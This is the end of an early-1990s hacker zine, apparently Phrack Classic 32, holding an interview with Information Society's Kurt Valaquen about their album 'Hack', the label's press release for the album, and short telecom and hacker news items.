KV: Oh, I haven't been following it, but I've been hearing a little bit about
|
|
it from my friends..
|
|
Me: Yea, because your album comming out titled "HACK" really does tie in
|
|
with this time period of hackers getting alot of press..
|
|
KV: Yea
|
|
Me: And I just thought that could have been one of the inspirations.. .
|
|
KV: Well, actually, believe it or not, we don't really know what it means to
|
|
title an album "HACK". We have a list of about nine different
|
|
interpretations that we thought we could leave open and anyone else could
|
|
decide which is the real one and strangley (Gruhm) the computer hacker
|
|
concept is pretty far down on our list. The first one we always think of
|
|
is uh.. the hack versus .. uh.. respected professional-- meaning-- like,
|
|
you know, their just hack, he's just a hack writer.. .
|
|
Me: Right.
|
|
KV: Their just hack musicians-- because uh, I guess we wanted to be
|
|
self-deprecating in a sarcastic and easily marketable way.
|
|
Me: Yea..
|
|
Me: What about your personal involvement in the Computer Underground? Is there
|
|
one? With hackers?
|
|
KV: Well, umm.. if I were not being a "pop tart" (which is our personal lingo
|
|
for rock star) I would probably be trying to make my money off of
|
|
programming.
|
|
Me: Aaah!
|
|
KV: Ummm, however.. that's not the case.. I am trying to be a "pop tart" so my
|
|
involvement is more limited that I would like it to be. I mean I do all my
|
|
work on IBM.. When I'm composing..
|
|
Me: Hm, Kurt, what are your thoughts and attitudes toward hackers and hacking?
|
|
KV: Umm, this is my thoughts and attitudes towards it: I am somebody who --
|
|
always. . always -- like when I had that telephone job, I just was, I
|
|
hardly did any work. I just spent the whole time trying to come up with
|
|
tricky things to do you know. Like I'd screw up other people's phone calls
|
|
and stuff and so like I'm way into it. And I understand why people want to
|
|
do it. BUT, I always kinda, knew that I just .. . shouldn't. Just because
|
|
it's stupid.. It was childish. And, I just wish that hackers could come up
|
|
with something better to do than get things without paying for them.
|
|
PH: Like something more productive?
|
|
KV: Yea, like .. uh.. umm, crash some sort of umm, killing organization's
|
|
computer system.
|
|
Me: Have you always had these thoughts or..just because of your popularity?
|
|
KV: Umm, I've had this attitude as I got older, because .. um, I'm just
|
|
becomming really bored with people devoting all this intelligence and
|
|
motivation into like avoiding paying their phone bill.
|
|
TC: Well, actually, that's getting away from the hacker as such. Because alot
|
|
of hackers are really into systems more than their into .. you know, toll
|
|
fraud.
|
|
KV: Well I sure hope so..
|
|
TC: Yea, I mean..
|
|
KV: My Idea of great hacking is gathering information that other people are
|
|
wronmgfully trying to withhold.
|
|
TC: Right.
|
|
KV: But, most hacking to me seems to be petty ways of getting things without
|
|
paying for them.. and that is just silly.
|
|
Me: That is the "90's hackers" Kurt.
|
|
PH: Yea, it's moving that way alot..
|
|
Me: It's in that direction.
|
|
Me: Tell us about the telephone job you mentioned?
|
|
KV: Well, I worked at a market research place. You all know what that is-- you
|
|
call up and say, "Hello, my name is Kurt and Im calling for marketing
|
|
incentives incorporated, and we are conducting a survey in your area
|
|
tonight... about toothpaste!"
|
|
PH: Hah
|
|
TC: ahha
|
|
Me: Bahaha
|
|
KV: "And I would like to know if I could ask you a few questions?" .. "What! I
|
|
don't wanna buy no toothpaste!" .. "No we were just going to ask a few
|
|
questions.." -- Ewwwwph..
|
|
KV: Like... you would try to come up with ways to not make the phone calls
|
|
because it was so painful to do.
|
|
TC: heh
|
|
KV: The best thing was when I umm. . this was a time when I didn't know much
|
|
about telephones.. or how they really worked.. umm. . but I managed to run
|
|
a little thing-- wires with alligator clips --uhh, from the phone that I
|
|
was at to the central switcher. And uhh, whenever I like got up to goto
|
|
the bathroom, or something, I'd go in there, and by connecting and shorting
|
|
the two wires out I'd break up someone's phone call.
|
|
PH: ha
|
|
KV: You know, but after a while, I thought to myself, WHY? I wish I could have
|
|
pulled something more creative like umm.. . installing a uhh.. a pitch
|
|
transposer on the outgoing signals, so that the people on the other end of
|
|
the phone would hear, "AND NOW, I WOULD LIKE TO ASK YOU: HOW DO YOU FEEL
|
|
ABOUT COLEGATE?"
|
|
Me: Bahaha
|
|
TC: ahha
|
|
PH: heh!
|
|
KV: That would have been funny-- aha.
|
|
KV: But, I never did that..
|
|
Me: Hmm, Do you know any other bands that are involved or interested in the
|
|
computer underground?
|
|
KV: No, I don't know that there are any-- most uh musicians are either
|
|
anti-tech or if they are into tech they arnt into it enough-- or they arn't
|
|
into it for it's own sake. Like, like hackers.
|
|
Me: Did you guys have any problems with the title of your new album?
|
|
KV: Like what do you mean?
|
|
Me: Well, do you find that most of your fans think you guys are into the
|
|
"hacking scene" because of the title?
|
|
KV: They can think of it anyway they want-- it a bunch of different meanings.
|
|
KV: Like uh, one member of the band thinks of it refering to him being a cook
|
|
and he likes to cut up meat.
|
|
Me: Hah
|
|
TC: heh
|
|
TC: What about like on the 12" with the "BlueBox 2600" mix and the
|
|
"Phone Phreakers" mix?
|
|
KV: What about it?
|
|
TC: Yea.. uh
|
|
KV: And the Virtual Reality mix?
|
|
TC: Yea, has that uh.. have you heard anything about that?
|
|
KV: Umm, no people in large just don't notice. I mean when your a hacker, I
|
|
mean you kind of forget how little people know. But it's unbelieveable how
|
|
much people don't know. And I'm sure one person in a thousand thinks that
|
|
those are anything other than, "Oh another wacky mix name!"
|
|
Me: Baha
|
|
KV: Most mix names are just inside jokes-- so most people don't bother trying
|
|
to understand them.
|
|
TC: Right.
|
|
KV: Umm, basically the only thing that has happened is that people have umm..
|
|
really responded to the concept of uhh.. us trying to tie into computer
|
|
hacking-- way more than we were really trying to. We just wanted it to be
|
|
a reference. And the people around us are kinda pushing us into it being a
|
|
theme. Were not really prepared for that. Because, while were into it, of
|
|
the three of us, Im the only one who can hold down a conversation about
|
|
tech. And even I have to move over and admit that I am not ane expert
|
|
hacker. I just dont know enough. Like.. Uh.. I know what an FAT is, but
|
|
I wouldn't know how to rewrite it.
|
|
TC: Well, that's another thing. Do you make a distinction between hacker as
|
|
someone who breaks into computers or a hacker who is an intense system
|
|
programmer?
|
|
KV: Do I make that distinction?
|
|
TC: Yea.
|
|
KV: Umm.. No.. Im not involved enough in the hacker world to make that
|
|
distinction.
|
|
Me: Do you have anything you want to say to the computer underground?
|
|
KV: Umm.. .yes let me think. . "Roller-skating is not a crime".
|
|
TC: Hah
|
|
PH: ah!
|
|
KV: You know that I live on skates don't you?
|
|
PH: Well on the album cover your wearing skates.. next to that car ... with
|
|
your..
|
|
KV: My teledestruction gear!
|
|
KV: And, I have to add a grain of salt to the phrase "Hackers of the world
|
|
unite" thats on our album cover..
|
|
PH: Right.
|
|
KV: We didn't actually intend it to be a huge banner.. it was suppose to be a
|
|
tiny little comment on the side.. and our label misunderstood our
|
|
intentions for that. We didn't think it was quite good enough to have it
|
|
be a huge .. in such huge print.
|
|
Me: Hmm
|
|
KV: Not a grain of salt.. A tounge and a cheek.
|
|
TC: hehe
|
|
<SILENCE>
|
|
Me: Well, I guess thats about it.. Do you have anything you wanna sum up with?
|
|
KV: Umm..
|
|
<SILENCE>
|
|
Me: Uh, Kurt, do you have an Email address somewhere?
|
|
KV: AH, well, Im embarrassed to say it but only on Prodigy.
|
|
TC: HAH
|
|
Me: Bahah!
|
|
PH: Heh
|
|
Me: Okay.. Well, if that's it..
|
|
KV: Wait. I do know something I can sum up with..
|
|
KV: Please.. In the case of our album try to overcome your instinct of hacker
|
|
tendancies and buy an original disk rather than just waiting for a copy..
|
|
KV: Ok?
|
|
Me: Hah
|
|
KV: We need the money.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
[The following is a press release for InSoc's new LP. --DH]
|
|
|
|
INFORMATION
|
|
SOCIETY
|
|
|
|
|
|
"Hackers have no regard for conventional wisdom. We have no regard for
|
|
musical conventions..."
|
|
|
|
-- Paul Robb
|
|
|
|
|
|
"Hack has multiple meanings, some of them self-deprecating. You can't
|
|
take any of this too seriously or you've missed the point. It's about
|
|
a playful use of technology, about breaking codes. It's a post-modern
|
|
aesthetic that comes through in our music..."
|
|
|
|
-- James Cassidy
|
|
|
|
|
|
"After having devised, erased and blotted out many other names, we
|
|
finally decided to call our album _Hack_ -- a name that, in our
|
|
opinion, is lofty, sonorous and significant. It explains that we had
|
|
been only ordinary hacks before we had been raised to our present status
|
|
as first of all hacks in the world..."
|
|
|
|
-- Kurt Valaquen
|
|
|
|
|
|
There you have it...as complete a definition of the vision of _Hack_ as
|
|
you're likely to get short of actually listening to Information
|
|
Society's superb new album of the same name. And if, after reading the
|
|
trio's treatises on the term, you suddenly have a clear understanding of
|
|
what the meaning behind _Hack_ really is, then something's gone wrong.
|
|
_Hack_ is more than the definition. It's a way of life. With its own
|
|
soundtrack.
|
|
|
|
"We're musical hackers of the first order," continues InSoc's Paul Robb.
|
|
"What we do is similiar to computer hackers breaking into sophisticated
|
|
systems to wreak havoc."
|
|
|
|
"Our music is really different from other progressive styles," adds
|
|
James Cassidy. "It's funnier and scarier...a mix of pure pop and sub-
|
|
versive stuff underneath the surface."
|
|
|
|
TOMMY BOY MUSIC, INC. 1747 1ST AV. NY, NY 10128 (212) 722-2211
|
|
|
|
_______________________________________________________________________________
|
|
|
|
N E W S * B O L T S
|
|
|
|
{A - G}
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
A> Four direct telephone circuits linking Seoul to Moscow were set to open
|
|
at midnight last night. South Korea's Communication Ministry said telephone
|
|
calls between South Korea and the Soviet Union have jumped from four calls in
|
|
all of 1987 to some 5,000 a month this year.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
B> In the latest issue of IEEE Spectrum (November, 1990), on pages
|
|
117-119, there's an interesting article entitled "The Great Blue Box Phone
|
|
Frauds", subtitled "Until the phone company separated signaling information
|
|
from the voice signal, long-distance calls could be made without charge by
|
|
anyone who could whistle at 2600 hertz."
|
|
|
|
It even has the illustration from the June 1972 "Ramparts" magazine, showing
|
|
how to constuct a "black box" to prevent the calling party from being billed
|
|
for the call.
|
|
|
|
There's also a list of about five or six other references at the end
|
|
of the article which sound interesting.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
C> Registering for AT&T Mail on-line: make a modem call to 1 800 624 5123
|
|
(2400, 1200, or 300 baud, 8 bit, no parity); give one (or more) <CR>'s; and at
|
|
the login prompt, type REGISTER followed by another <CR>. The system will walk
|
|
you through its on-line registration procedure. Have a creditcard number or
|
|
EFT number handy. You can back out at any time with a ^C (<cntrl>-C) and a
|
|
QUIT.
|
|
|
|
A couple further AT&T Mail features:
|
|
|
|
"Mail Talk" permits retrieval of messages w/o a terminal from any DTMF phone --
|
|
text messages get "spoken" by a synthesized voice; and there are "Autoanswer"
|
|
and "Autoresponse" options permitting fairly flexible automatic response to
|
|
either all or selected incoming messages.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
D> Detroit, Michigan time 313-472-1212. May soon be replaced with
|
|
a 900 number that charges.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
E> In Australia, the hacker known as Phoenix was charged with Defrauding
|
|
the Commonwealth, Conspiracy to Commit Treason, and Conspiracy to Commit
|
|
Murder. The United States has sent representatives from the Federal Bureau of
|
|
Investigation (FBI) and the Computer Emergency Response Team (CERT) overseas to
|
|
help investigate the situation and aid in prosecution of Phoenix. In the
|
|
meantime, the "eccentric" Phoenix is maintaining ties to hacker friends in the
|
|
USA by use of the Internet.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
F> Bellcore reports that we have only 9 unused area codes. The current
|
|
system of generating the codes was supposed to last 100-200 years. Not to
|
|
worry, a representative at the Bell organization says a new plan is already in
|
|
the works. The new system consists of replacing the 2nd digit (either 0 or 1)
|
|
with a number between 2 and 9. Bellcore says the new plan should last 200 more
|
|
years. Hm.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
G> A new BBS has been set up for a communication flow between hackers,
|
|
fed, and journalists. 713.242.6853 Instant validation for all. The BBS is
|
|
called FACE to FACE.
|
|
_______________________________________________________________________________
|
|
|
|
*** END OF PHRACK CLASSIC 32; Email: pc@well.ca.sf.us
|
|
-------------------------------------------------------------------------------
|
|
|
|
|
|
|